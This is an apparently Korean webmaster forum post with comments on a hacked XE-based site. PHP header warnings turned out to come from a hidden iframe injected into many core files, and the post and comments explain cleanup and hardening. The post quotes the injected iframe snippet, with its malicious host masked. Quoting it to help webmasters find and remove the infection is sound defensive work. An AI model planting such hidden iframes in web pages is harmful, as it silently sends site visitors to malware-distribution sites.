웹마스터 팁
홈페이지 헤더부분에 display.handler.class.php 오류발생시 급해결방법
2009.08.09 18:56
다음은 오류내용입니다~
-----------------------------------------------------------------------------------------------------------------------------------------------
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 138
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 389
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 390
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 391
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 392
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 393
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 394
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 148
Warning: Cannot modify header information - headers already sent by (output started at /home/hosting_users/cacomm/www/xe/modules/homepage/homepage.class.php:66) in /home/hosting_users/cacomm/www/xe/classes/display/DisplayHandler.class.php on line 148
-------------------------------------------------------------------------------------------------------------------------------------------
위 오류가 홈페이지와 관리자접속(admin)시 헤더에 나타난다면
뭔지는 모르지만 다음파일에 악성코드가 입력되있습니다.
(어제 올라온 질답글에 xe님이 올려주신 내용중 발췌했습니다)
www/xe/index.php
www/xe/modules/homepage/homepage.class.php
www/xe/modules/homepage/homepage.smartphone.php
www/xe/modules/homepage/homepage.admin.view.php
www/xe/modules/homepage/homepage.controller.php
www/xe/modules/homepage/homepage.model.php
www/xe/modules/homepage/homepage.view.php
www/xe/modules/admin/tpl/index.html
www/xe/modules/rss/tpl/index.html
www/xe/modules/session/tpl/index.html
www/xe/modules/communication/tpl/index.html
www/xe/modules/spamfilter/tpl/index.html
www/xe/files/cache/module_info/homepage.ko.php
www/xe/common/tpl/default_layout.html
보니 악성코드의 내용은 아이프레임(iframe)이였으며 내용은 맨밑에
<iframe src="./http://????????.com/index.php" width=200 height=141 style="visibility: hidden"></iframe>
이러한 코드가 삽입되있는것을 볼수있습니다.
일단 이것을 고치는 방법은 저 파일을 원본파일로 덮어쓰기하여 수정하는 부분입니다.
파일은 첨부하겠습니다^^;(물론 파일을 하나하나 찾아서 업뎃하시는것도 괜찮지만 전 귀찮아서;;만들었습니다 또당할까봐-_-;)
또한 저 위 파일말고도 뭔가 더 수정됬을수도 있을꺼같은데 뭐 그건 함 더 걸리면 통체로 다운받고 index나 익스플로러에
뿌려지는 파일을 하나하나 찾아보려고 합니다--;;
뭐 아무튼 아무쪼록 저런 display오류가 나타난다면
메인 index.php파일을 확인해보시고 맨아래 저런 코드가 삽입되어있다면
가차없이
덮어씌우기 바라겠습니다--;;
근데 어떻게 저기에 저렇게 코드가 들어갔을까요;;;
댓글 3
-
jjabez
2009.08.10 15:48
-
:맥노턴
2009.09.10 15:29
별도의 포렌직 도구를 개발하지 않으셨다면, find 의 -mtime 옵션으로 특정 기간동안 수정된 파일을 자근자근 검색해서 변경된 파일을 뽑아내서 작업하시면 백도어를 찾는데 도움이 되실겁니다.
물론, 로그 분석(운좋으면), 암호변경 잊으시면 안되고, find / 해서 전체를 검색하셔야 하고,
서버에 설치된 모든 패키지들의 버전정보를 뽑아서 보안 리포트와 대조하시고,
심각한 녀석부터 업그레이드 하시고, 불필요한 패키지는 과감히 지우시고, 보안정책 수정하고... ㅡㅡ;
ㅎㅎㅎ; 고생하셔요... 새로 싹 밀어버리더라도 원인을 파악하지 못하면 또다시 들어옵니다... ^^; 원인을 찾아내시길...
XE문제일 수도 있으므로 유심히 구석구석 살펴보세요...
-
쥬시쿨
2010.04.28 02:10
저런 파일의 권한을 변경하는건 안되나요 ???
FTP 아이디/비밀번호 유출되면 저 악성코드가 심어집니다.
그리고 위에 아이프레임 주소는 바이러스 유포사이트로 리다이렉트되는 주소입니다.
때문에 이 곳 게시판에 명시하실 때는 실제 주소를 써 놓으시면 안됩니다.
http를 hxxp로 명기하시던가 링크사이트에 접속하지 말도록 공지하시는 것이 좋겠습니다.
다행히 현재는 유포사이트 호스트가 폐쇄중라고 하네요.